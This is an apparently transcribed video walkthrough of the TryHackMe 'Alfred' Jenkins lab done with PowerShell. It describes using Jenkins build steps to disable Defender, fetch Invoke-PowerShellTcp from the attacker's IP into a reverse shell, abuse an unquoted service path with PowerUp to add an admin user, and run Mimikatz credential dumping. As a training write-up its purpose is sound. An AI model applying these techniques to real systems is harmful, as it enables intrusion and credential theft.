Alright, welcome back to more hacking with PowerShell. So today we're going to be looking at Jenkins on TryHackMe. So I have connected to my TryHackMe VPN on Windows this time using OpenVPN. From there I have TryHackMe up and running, right? And we're going to go ahead and we're going to see if we can actually get this guy. Okay. Using, maybe not like the privilege escalation, all that good stuff. We might try it, but mostly just using Windows PowerShell to be able to get into that Jenkins web server and get that initial shell. So the very first thing we're going to be looking at is a port scanner. So let's go ahead and type in a port scan, PS1. Alright, and let's see if we can find something. Port scanner, PowerShell, PowerSploit, invoke port scan. So we do have something like this: invoke port scan, simple port scan module. Does simple using regular sockets. Cool. From a file. Okay, so let's try to go ahead and use that. See if we even have that first. Do I even have that PowerSploit? TV in the PowerSploit? No, I do not. That's okay. Let's go ahead and head back over to here, and we will get this guy right here. So we just download all PowerSploit if we want to. Code, download a zip, and we'll head off and over into here, right? Oh my God, I know. There's scripts and stuff in there. Alright, so let's go ahead and we're going to head off over in here, and we're going to try to do that PowerSploit and see what we can get with that. Alright, so let's go ahead and I think we might have to actually download that again. We'll find out. CD into users, Ryan Y downloads. PowerSploit should be in here now. Let's try a expand archive. PowerShell access control, power up. It doesn't look like PowerSploit is actually in there. Did it download yet? Okay, it failed. Let's resume that. Let's retry it again. And there we go. Okay, that got it that time. So let's go ahead and hop back over into PowerShell here. Alright. And we'll do our expand archive for PowerSploit, right? Actually, we could probably just copy. Let's go ahead and copy PowerSploit. And we'll copy all PowerSploit into C drive, users, Ryan Y, OneDrive, desktop, CRTP, tools. There we go. Let's CD into there. It's weird not having like multiple windows. I also don't know how to do multiple windows with PowerShell. Or if you can you split windows horizontally? Horizontally PowerShell. You can do that. Control split panes in Windows terminal through PowerShell. Split the parent. Okay. How do I do this? How do I do a split pane? Oh, it's a pain in the ass, okay. So function is introduced quite early, okay. While new panes can be created using keyboard shortcuts, I'm more interested in doing this dynamically through code. I don't want to do it through code. I want to do it through a shortcut. I don't want to type in a bunch of code. So TAC H. Doesn't make any sense to me. How the hell is it control TAC H? Is it control H TAC? No. That's super confusing me. So like right there, shorthand, split the plane, or just sub command horizontal. Let's try that. I feel like that's not going to work either, but we'll give it a try. Yeah, okay. So, of course not. You got to write up a whole code just to split something horizontally. All right, let's go ahead and do an expand archive for PowerSploit, and we'll CD in that PowerSploit, and then in the recon PowerSploit, recon. And we should have our invoke port scan like right here. Invoke port scan. And let me guess. Okay, command prompt PowerShell TAC EP bypass. And I don't know what the heck just happened. For some reason my font just went way down. I don't know why everything just went crazy whenever I just did that. That's super weird. Control-Shift-C and Control-Shift-V as copy-paste. I'd rather do that. But I don't know why it just went to... There we go, okay. That was really weird. So let's try to invoke port scan, right? And then from here, we'll go ahead and we will do a invoke port scan, I believe it's going to be. Okay. I don't know what parameters I actually need are. So let's try to look at it. So I'll actually type it out and see what it actually says. Like, what are the different parameters I actually need in this thing? I think I need IP address. I'm going to go with that. Okay, so let's see here. Okay, that was pointless. Okay. Let's see here we get horizontal. Everything breaks after that, it looks like. It's like just everything just broke after horizontal. Does that happen like right there? And we finally got stuff again? Okay. I'll never try to do horizontal again. That was the worst idea I've ever had. Okay, here we go. So, parameter host, include these comma separated hosts, okay? Host file, exclude host ports, include these comma separated ports. So let's do host at first and see what it decides to do. So let's try to do invoke port scan, tac host, and then we'll throw in the IP address for the Alfred. Let's go ahead and throw this in there. And supposedly, I believe we're starting a port scan. I wonder if we can do like a verbose with it. Okay. I do feel like port 8080 is going to be open. Okay, so we have port 80, 8080, and 3389, right? And those are all live. So we do have port 80 and 8080. So let's go ahead and check out that port 8080 first. We'll copy that down, right? Do port 8080 on here. And let's see what we get. And 3389. So we do get a welcome to Jenkins. Okay, let's try admin, I guess. Admin. And we'll also try the other port, port 80, see if we get anything for like a username, password, or anything like that. I feel like it's going to be admin, and it is. Okay, cool. So, yeah, don't care about that. So we can do this a couple of different ways. I am going to try to do it with builds this time, if we have builds. We do have a project here. Alright, last successful was 2 years ago. And we should be able to change it. Let's go ahead and configure that project. And we should be able to do it within here, configuring this project, right? So, first thing I want to do is see if Powershell's on here. So we're going to do a Powershell Who Am I. Who Am I was already on there. I don't know whose that was. But we're going to go ahead and do PowerShell Who Am I. We're going to save that. We're going to build it. So build now. We'll look down here and we'll see if we get anything, like something comes back, like you know, whoever we are, a name, and that'll tell us if it's actually working or not. So we want to look at the console output pretty much whenever a file comes through, right? So Alfred Bruce. So we know that yes, this does work. All right, we got, hey, it's on. Looks like it's on a domain controller called Alfred, and the username is Bruce. Is what it's looking like. We can also verify the username is Bruce because we have a C user Bruce. So it looks like Alfred is the domain controller, Bruce is the user. So we do have that. So I don't know what his privileges are, and I think if I do a /priv, I think that kind of throws it off. Doesn't really know what to do with that. But there are other things we can do. So let's do actually PowerShell throws it off. Let's do a Who Am I /priv like that. I don't know what my privileges are. But we can add more steps. So let's go ahead and add something, right? And then we'll say PowerShell. And let's go ahead and see if we're allowed to tear down the firewall. at all. Alright. So we can set MP preference to disable real-time monitoring to true. Let's see if we can do that, if there even is a firewall. I have no idea. So let's see if we can even do that. Alright, we're going to add another one in there, and we're going to do the same exact command, except for this time it's going to be IOAV, right, variable. So disable IOAV protection to true. Alright, and we're going to do PowerShell at the beginning of it. And then we're going to add another command, add build step. And this will keep going till it fails. So if it fails like right here, then we'll just delete that one or whatever else, but I'll have the rest of them already set up. And what we want to do is we are going to serve up a file. I want to serve up invoke PowerShell TCP. Alright, this file like right here is part of the initiating files that we can utilize, okay? I want to invoke PowerShell TCP. That will help me to create a reverse connection. Okay. If you watched my first Alfred video, I'm pretty sure we did all of this in the console thing. We did it like that. This time we're actually going to try to do a build. Alright, so let's go ahead and do a Python 3 THM simple or http.server on port 80. Alright, who said you couldn't hack with Windows? Well, we still don't know yet, we're just thinking that we can. And we're going to do a PowerShell again. This time we're going to do attack EP bypass, just in case. wget, or you know what we can do? We can do a invoke expression, invoke web request, HTTP. I have no idea what my IP address is over here. IP config 10.13.26.184. Okay, so we'll do 10.13.26.184 slash invoke, what was it, TCP, and we want invoke PowerShell TCP, right? So let's go ahead and head back over here, invoke PowerShell TCP. If we get something like that Internet Explorer has never been started before, or the first script or whatever, something about Internet Explorer, right, pretty much sucking ass, that's pretty much what it says. But if we get something like that on there, we can type in this, use basic parsing right after invoke web request. It tells you what to type in, it just doesn't really tell you where, and it can get really confusing of where to put this use basic parsing, and that's going to be right after invoke web request, just so you know. So if we get that, then we know, okay, that's the issue. Okay, we're going to leave it right there for now, because what I feel like is going to happen, so I can open up another PowerShell. We'll just open up another PowerShell. So we'll add another build step, and you know what, we're not even actually going to do that. We're just going to keep going off of this guy. We're going to say invoke PowerShell TCP attack reverse attack IP. Alright, so the IP address is going to be this one, like right here. Attack port, and we'll say the port is going to be 443. Alright, something realistic there, right? And let's go ahead and head back over in here, or excuse me, let's go ahead and let's see if we're at here. I don't know where the hell we're even at. There we go. Okay, and we will open up another PowerShell. Right click, run as administrator, and we will go into CD into actually command, go back into command prompt and do a PowerShell attack EP bypass, and go CD into users, Ryan Y, OneDrive, desktop, CRTP, tools, and we're going to do powercat.ps1. We're going to type in powercat, and powercat's kind of like it's kind of like a this thing's way down there. There we go. Powercat is kind of like netcat, just so you know, okay? Just for PowerShell. So we'll do a powercat tac L tac V tac P on port 443. Now PowerCat it will just shut down. And so like netcat will just sit there and listen. PowerCat will not. So you do have to kind of move fast once you're done with everything. So that should be it, like right there. As long as everything's typed correctly, hopefully that works. I don't know if we're allowed to shut down the firewall, things like that. I don't know if the firewall's already shut down. Could already be shut down. It looks like 3 did not want to work. So what happened here? Let's see. So who am I / priv? Okay. And as soon as I went to shut down the firewall, it did not understand what that was. So it failed like right there and said, no, we can't do that. That's okay. Let's go ahead and go back to our project. We'll go back to configure. I'm just used to shutting down the firewalls and everything like that. So let's go ahead and delete that guy. We'll delete this one. We can also delete the who am I priv because we know that works. And we'll go ahead and save this. And let's go ahead and try to run that now. Let's make sure my PowerCat is still working. See? That's what I'm talking about, like right there. And we'll go ahead and we'll do a build now. And we'll see if this guy decides to do a level 4. Oh, and he is not. I also don't know if this is going to work or not. I have no idea. Okay, so what do we have here? We have command, blah, blah, blah. The term invoke web request is not recognized as a command line. Okay, so this might be an older PowerShell. If invoke web request is not recognized as a command line, this is most likely an older PowerShell. So I have another idea. We are going to have to go back into configure, and what we will do is we will act as if we are just going to download it, right? We'll do a wget. So let's go ahead and do a wget. HTTP, boom, boom, right? Tag out file will be the same exact thing. And what I'm also wondering is, even though this is happening like right now, are we getting, okay, it's not even coming back and trying to grab it. Okay, I want to make sure of that too. So PowerShell EP bypass, wget that file, tag out file, bam, invoke PowerShell TCP, which would be that guy right there. Actually, now we have to do a / invoke PowerShell TCP, boom, and then invoke PowerShell TCP. Hey, beautiful, how are you? Well, I figured if I'm already, eating cheese, I might as well get the Cheez-Its. I only had a couple because I figured they're for the kids, so I didn't have too many. Alright, let's go ahead and save that. We'll see what we got. Let's go ahead and build that now. Oh, actually. Good night, I love you. Alright, let's go ahead and get this guy up and running again, the PowerCat, and we will build that again, and let's see if we get anything with that. Hopefully we get something. Like I said, I have no idea if this is actually going to work or not. Console output, what we got here, okay. So, wget, HTTP, blah, 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 tag out file that. And the term that is not recognized as a command line function, script, file, or operable program. Yeah, I understand that because it's telling you to get it. Does it even try to get anything yet? It does not, no. That's really strange. Let's go ahead and break these down into different commands. Let's try that. Go back to configure. Again, I have no idea if this is going to work. And let's try to break these down to different commands. Okay, so we'll do a PowerShell. I don't know if I even need to do that. Well, I won't need to do that just yet. PowerShell wget. That's like right there. Out file will be that. Okay. Let's go ahead and just try to get that. And see if it runs any faster this time and see if we get that connection back. There we go. Okay, so we got a connection back finally. Alright, let's go ahead and look at what we put into there, right? Let's go ahead and look at configure. So it took us so long because for some reason invoke PowerShell became power. I don't know why. I don't know like when that changed. I don't ever remember changing that, nor did I. But whatever, that's okay. So we have a PowerShell IEX, right? It's going to download web client. Okay, boom, boom. From there, we're then going to tell it to start that script. That's why I did like right here, because it was saying that hey, it couldn't do that. It couldn't find invoke PowerShell TCP. So I said, hey, go ahead and start that script. From there, invoke PowerShell TCP, the IP address, and then port 443. And we finally get that call back, right? So if you're watching this on YouTube, there was probably a huge break in time, like right there, We just spent about 45 minutes troubleshooting that, but you won't see any of that. I'll make sure there's very little, or maybe I'll just speed through it. No, stop again. We'll do something. We'll find out. Or maybe just not do anything and just say screw it. Alright, so now we're here. Let's go ahead and do a DIR. Alright, so there's nothing in there. Alright, what we can do is maybe a, let's see here. Can we do a IEX new object? Edit tab, nope, new object. Net.web client. Net web client, whoa, net web client, period. Net web client, period, download string. Is that how it goes? Download string, yep. Okay. Download string, HTTP 10.13.26.184 / let's use powerup.ps1. Let's do something like that. Let's try that, like right there, see if that works. And if we can get power up to work, I feel like our lives are about to be a lot better. So let's go ahead and do an invoke all checks. See if that works. That'd be sweet if it did. I do like when I hit tab and things like that through it, but okay, so invoke all checks seems to have broken it. Or at least it's not getting anywhere just yet. We'll give it a minute. Or 10. Okay, invoke all checks worked. So what we got here? We have a lot of stuff here. Let's go ahead and start off with some things, see if we can restart some stuff, and if we have anything that's like unquoted service path, something easy. Alright. We just did a video on that. And I have a... Am I like an admin or something? Hold up. Because I have a permissions to do a bunch of stuff here. Permissions. Rewrite, okay. These are all DLL. Let's just do, what was it? Get unquoted. Quoted service path. Is that what it is? I don't think that's a real thing right there. Let's go ahead and do a type out power up. It's not going to be able to do that, is it? Let's go ahead and do it on my own machine. Let's actually get over into my own stuff, and there we go. This is my machine, like right here, right? And we'll go ahead and we'll actually put power up on here. Power up. Okay, then we'll do a, what is it? Get unquoted. Get service path unquoted. Service unquoted. Alright, so it's get service unquoted, but I just saw something really slow. I think I might have just found a bug. I can't throw it out on YouTube just yet, obviously. So I'm going to keep working on this guy, but I feel like I just saw something that we shouldn't have seen. These also look like these are all unquoted service paths right here. Okay, so I can restart these. AWS Light Agent actually looks like something that, you know, we're going to go ahead and we're going to try to abuse that function and see if we can restart that service. You know, it does say that we can restart it. We did get a service unquoted, so we do have some unquoted service paths there, and I saw some unquoted service paths on my own machine for some scary stuff, so I might have just found a bug somewhere. So we're going to try to exploit that and then send it to the proper people, and if it actually goes through, then I'll let you guys know. If it doesn't, then fuck, I'll still let you guys know. I don't care. Alright, but that'll take like a little bit. But okay, so we got this AWS Light Agent, right? We can restart it. Let's go ahead and do an invoke. Man, I'm trying to remember. I'm gonna have to actually not allow you guys to actually see anything on here. So this is all now it's unblurred, or if it wasn't blurred, I just skipped that part because that was the part that had bad stuff on it. I believe it's invoke service abuse. That's what it is. Okay, so invoke service abuse. And the reason I'm going back over to my other machine is because I can tab. This one I cannot. Invoke service abuse. Alright, for tag name AWS Light Agent. Alright, let's go ahead and try that one. Net user John, password 123, blah blah. Okay. So looks like it did work, but looks like what I kind of want to do is tag username, like who am I? Who am I? I'm Bruce, right? So can we do a tag username Alfred / Bruce like that, and then maybe a tag password, maybe even change the password to my favorite PSNSSW0RD1. Could we do something like that? It says that we did it, so we may have actually done it, but then it says that there's an error, right? So let's go ahead and do a net user. Okay, so it said there was an error, but definitely added John onto net user. So Bruce now may be. Let's go ahead and restart that service. Do a command prompt, and we're going to do a. I want command prompt. I don't want PowerShell anymore. Is it restart text service? And then the service name. And PowerShell, I actually want command prompt right now. Okay, I think I just did it actually. Is it restart service? So it's just restart service and service name, I believe. Okay. So I think I might have changed Bruce's password. I don't exactly know. I'm gonna try remote desktop and do it. Remote desktop into what's that guy again? This IP address for Bruce. We're gonna try it like that, okay? Let's see if we can do it. So he has this stuff using Metasploit handler. So he has it PowerShell. He's creating another shell, bringing it back to Metasploit, right? Then he's doing a privilege escalation. And let's see here. Who am I / priv? He's using listing tokens for it, right? I don't know what that one thing was even running as now I think about it, the AWS. But let's try to go ahead and see if we can do this. Connect. Nope, more choices. Use a different account. Let's do /John first. Password 123 exclamation point. So that service abuse did work. And John is now an administrator. So service abuse, ooh, okay. It did not work. John, PASSWORD 123 exclamation point. So I believe it should be. Okay. So that service abuse did work. So you guys just saw it. Now this is the second time, or third time, so that you guys have now seen the service abuse work. This time it was with AWS Lite agents. So that's exciting, right? Or something. Okay. And then from here, let's go ahead and see what we have. My back itches. My neck. My back. Just kidding. Sorry. I kind of want to just see what privileges I have with this guy. But I don't know if I'm supposed to be remote desktoping this guy. I don't know how long it's going to take to open everything up. All that stuff. Let's go ahead and get into PowerShell. And we'll do a right click, run as administrator, because John should be an administrator. And he is. Okay. And we should be able to do a who am I /priv. Okay, so everything's pretty much disabled, but I am an administrator. And we're supposed to be like NT authority system or something like that. Let's go ahead and CD into the C drive. I don't know where the hell the I don't know what flags even are. CD into users. I'm just kind of showing you guys that you can do this different stuff. I wasn't really planning on actually running through this thing. CD into Bruce, I guess. Desktop, is it in here? Where are the flags actually? Type user.txt. Okay. CD into the C drive again. I guess users administrator? I don't know what where the other flag actually is. Okay, and C Windows System 32 config. I don't know if you guys can actually even see this either. I apologize for that. Let me go ahead and get that font a lot bigger than what it is. I don't know why the heck it says it like that or whatever. Yeah, something. There we go. 24. No, you guys, what I usually use for you guys to think. Alright, so let me go and see system 32. Program files, I believe it was. Where's this thing at? No, it's in Windows. CD in Windows, system 32. And then it was config. I can look at it. Can I read it? If I can. And there we go. So we actually use the AWS light for power up. We use that to actually get in this time. We did not use whatever the Alfred wanted us to use here. He wanted us to use tokens. Use someone else's token to impersonate another token. Now what I'm wondering is if we can also do like ASRep roasting or something like that. If we can do that, if Bruce is susceptible to that, right? Let's go ahead and pull up our notes, right, for ASRep roasting, because we just did this not too long ago, right? So let's go ahead and actually, you know, it would be way easier probably is if I grab this whole thing, copy it, bring it over to this guy. Damn, I was really hoping I could just paste it. There, paste it, and then just work on it from over here, huh? So let's go ahead and download string, and we will do. Well, I don't want to do it in there, anyways. Control C, CD into users, Bruce, or actually John, desktop. Okay, and we'll go ahead and we will right click that guy again, boom, and we're going to use power view dev.ps1. Alright, and we also want, and then from here we're just going to see if we even have anyone that's ASRep roastable, right, with the get domain user pre-auth not required. I don't know if I still have my stuff up and running like right now, which I do not, it looks like. That's probably why it's taking so long. And he's like, hey, that doesn't actually exist, morons. Alright, it got it this time, it looks like. We got a get over there. Okay, let's go ahead and do a dir over here. We won't see it because it's running in memory. Download screen, okay, it's running in memory right now. So let's go ahead and do a get net use, what was it again? It's going to be get domain user pre-auth not required. Get domain user tag pre-auth not required. Let's see if we got anything like this. And we do not. That's okay. Alright, let's go ahead and try to get Mimikatz up and running here. Right? Invoke Mimikatz.ps1, right? Now, again, we have yet to touch Kali. We have yet to touch Metasploit. How I would do this one, if this is your first time doing it, is I would run through it just like they do, just like he talks about in his thing. It is right up there. Just follow that, go through it. Then I would come back and try it with, hey, let's just try it with only using Kali and not using Metasploit this time. Let's, after that, okay, cool. Or maybe not using Meterpreter, you know, or something like that. And then next time, okay, now this time I want to use only Powershell, you know, or maybe Impact it or something like that. So, and then start to look at, okay, what else can I do to it, right? So things like, okay, let's invoke Mimikatz, and then, okay, how far can I bring this invoke Mimikatz? Can I even do it? Can we pass the hash with it? Can we do different things? You know, is there actually administrator even hash on here? Things like that. So that's what I would do. That's just me. I like working on boxes that I've already completed and trying to figure out other ways to be able to do it. I like reading up write-ups that I've already other people have done for boxes I've already completed. Sometimes I go back and I just read them for boxes that I did, you know, 6-7 months ago. I'll go back and sometimes I'll watch my videos again because I don't remember what the hell I did, and I like to look at it again and see. Oh yeah, that's how they do it. And then look at what someone else did. So I'll get off my high horse there for a second. Maybe Cass wants to work. That'd be sweet. But yeah, I mean, this is pretty cool. I think that we were able to do something totally different than what the author wanted us to do. So yeah, that's pretty cool, like right there. Invoke maybe cats. I think we may have broken it. And this is probably gonna be my last thing for this video, for this part of it. This will be it. Just invoke maybe cats if it decides to work. May have broken the system. I don't know yet. We could have also maybe done a PS with like different credentials or something. Could we have done something like that? I wonder if invoke maybe cats that we came across. That's cool. Okay. I wonder if we can do something like this where we can do like a ses equals new PS session, right? Computer name is going to be, I don't know what the hell the computer name is over here. Like, I wonder if we can do this for, I wonder if we can even do this, in all honesty. I don't know if we can because he's not really directly connected, right? Okay, maybe Cat seems to have broken it. Let's go ahead, let's look at host name. Computer name is Alfred, okay. And then credentials would be for John, I guess? Can we do something like that? Can we do that? Can this guy talk to the other one? He has to be able to talk to my machine, right? Alfred. Attack credentials? John? Can we do that? John and then... When our ARM client cannot process the request, the authentication is different from the so the client computer is not joining the domain. The HTTPS transport must be used for the destination machine. Must be added to trusted host configuration setting. When RM command to configure trusted host. Okay, I want to do that. No, that computer is in the trusted host list might not be authenticated. You can get more information. Okay, so how the hell use winrm.cmd command? Ooh, okay, I've never done this. I want to get a trusted host. I want to do this. Okay, so use winrm command to configure trusted host. So it obviously has trusted host that way for a reason. So I wonder, could we do like a winrm trusted host? Guess not. Is there any trusted host over here? I guess I could always look it up online too. winrm command trusted host. There we go. Not the first person to ever ask this question. That's what I'd see. Computer name, blah blah. Yep. Okay. winrm config client at trusted host. Boom boom. Okay. So that's all I gotta do. And I have to put that in this machine, in my machine, I take it. And then we might be able to do a PS session. Is that like what's about to happen like right now? Okay, let's go ahead and press Control V, okay. And we obviously want to put in trusted host of the IP address, right? Copy that. We've almost been working on this for 2 hours now. Whoa, an hour and a half. Guys, do that and hit enter. Okay, what does this say? Specify the request. Verify the service on destination is running as accepting request. Ah, that's a good point. Okay. Destination is in the WinRM service. Run the following command at destination. Analyze and configure the WinRM service. WinRM quick config. Let's do it. Let's see. I mean, I'm in this stuff now, so might as well try, right? WinRM is not set up to receive requests on this machine. The following changes must be made. Set the WinRM. Will make these changes? Yeah. I mean, I'm hacking into it. I don't give a care. When our firewall exception will not work since one of the network connection types on this machine is set to public. Change network connection type to either domain or private and try again. Really? Firewall exception, okay. But it started, so I don't care. I don't care if the firewall exception doesn't work. We'll just tear the firewall down. Huh. Okay. Well, I feel like we tried. Invoke web request. I feel like we did try. I don't know why I just typed that in. Invoke Mimikatz is what I want to try. Let's see if it ran any faster. Trying to get it run as fast as possible, but that's what I was trying to do this over here. I wonder if I can do. Yeah, I still can't do that, huh? Yeah, okay. Run the following command destination analyze servers. But he's saying something about that it's. I guess we could always look at it, huh? What's the problem now? Okay. One of the network connection types on this machine is set to public. Change it to domain or private and try again. Okay. Network connection, right? Network sharing center. While Mimikatz is trying to go, we'll try to do this. We'll see if we can do anything. Suppose we were a damn, what is it? Suppose we were an admin, so, I mean, we opened up an administrator shell over there, so I mean, and now it's just really how long is it going to take to open, you know? And is it worth it? Things like that, so, okay. So this public network right here, we got to change this to private or domain network. I guess we'll change it to work network. Hopefully I don't mess this whole thing up and now, well no, because every time it gets reset, it resets and everything, huh? Okay, so we changed to a work network now, right? Yeah, Mimikatz is breaking this thing. Invoke web request? Or not? Come on, Ryan. Make these changes? Yes. Okay. So we have a WinRM thing now going. Hopefully you guys kind of saw what I did like right there, because I sure as hell didn't. Let's try to make this trusted host again. Actually, can I just do a session now? Credential John. Used on this machine must be added to the trust host. HTTPS transport must be used, or the destination machine must be added to the trusted host. But it is being used, and I try to add it to the trusted host. You won't let me. You keep telling me this, but WinRM quick config has already proved to us that everything's good. Oh, it's HTTP. Create an HTTP listener. Okay, WinRM is already set to receive requests on this machine. WinRM is already set to for remote management of this machine. So why can't I do the trusted host thing now? Is my question. The client cannot connect to the destination specified in the request. Verify the service on the destination is running. I don't think you just. I think it just can't get there, huh? That's a problem. Like right there, and I think it has to do with. Well, that might actually not be a problem because it is a Windows machine. This is the correct IP address, right? 10.10.147.26. 10.10.147.26. Okay. IF or IP config. That is showing us that we are indeed here. Okay. And from there, I guess he can't ping it. $147.26. And he's saying that he can't find that guy right there, huh? Okay. It is running. It is accepting request. One RM quick config is running. That's working. Yeah. Cannot connect to the destination specified in the request. Maybe I'm messing up this trusted host thing, like right here. Maybe I need to change out that computer name. What do you guys think? Try that. To the actual IP address, not Alice, or whatever it is, Alfred. Let's try that like real quick, huh? Nope. Alright. Okay. Doesn't look like we're getting anywhere with that, huh? Yeah. Alright, looks like we're not gonna get anywhere with that guy. I guess I could try invoke mimikatz one more time. Let's do an invoke mimikatz, then we'll do a tac command. Let's make it a little bit easier on this guy, I guess. LSA dump, LSA /patch. Let's do something like that. We'll see if we can get anything with that, like right there. And that will be the last thing that we do within this guy. How you doing, Sharma? We just did some try hack me, Jenkins try hack me, Alfred, whatever it's called, yeah, Alfred. We just did it with only PowerShell. Wanted to try like a try hack me or something that would just PowerShell, see how it went. And I knew that you could do Jenkins with PowerShell, and we did that whole thing. And we just did all of that, so that was a pretty good time. So yeah, that was a good one. And right now we're trying to do some invoke mimikatz and seeing what we can get with that. Hopefully we get somewhere with it. Hopefully. Yeah, I'm only going to let this run for a few more minutes and then we're going to be all done. If you just want to see me get to the root and the user file, or user and root file, I guess you are done now. I guess you left a while ago. But other than that, that is really going to be it, because I'm not getting anything over here. We could always try to do a session from like here back to myself, I guess. Could always try something like that. We could do like a sess equals new PS session. I have no idea if this is going to work. Tac computer name, we could try 10, 13, 26, now 184. Will this work? I feel like it's not even going to work, because it's not like we have credentials to actually be able to get into it, you know? So I feel like that's not going to work at all, like right there. It looks like mimikatz is just, and it's getting the same exact thing that I was getting before. It could also be because this one's using PowerShell from 1947, so pretty sure this was actually the PowerShell that Europe figured out how Hitler was changing out his what is that machine they had there for encryption. Pretty sure this is the same PowerShell that Europe was actually using. I realize that that's not true. I promise. I realize everyone thinks that Americans are idiots, so That'll go viral. Like, this guy thinks they use Powershell for, what was it, Enigma? Is that what it was? Enigma or something like that? Alright, looks like we're not getting anywhere with maybe cats, so that's going to be it for this video. I can guarantee if we just let this guy run, which I probably will. I guarantee if we just let this guy run and just let them run, we would finally get somewhere, but it's not getting anywhere like right now. So that's going to be it for this. I'm going to go to bed, so I hope you guys have a good night. Hope you guys enjoyed this, and yeah, have a good one. I'll talk to you all later.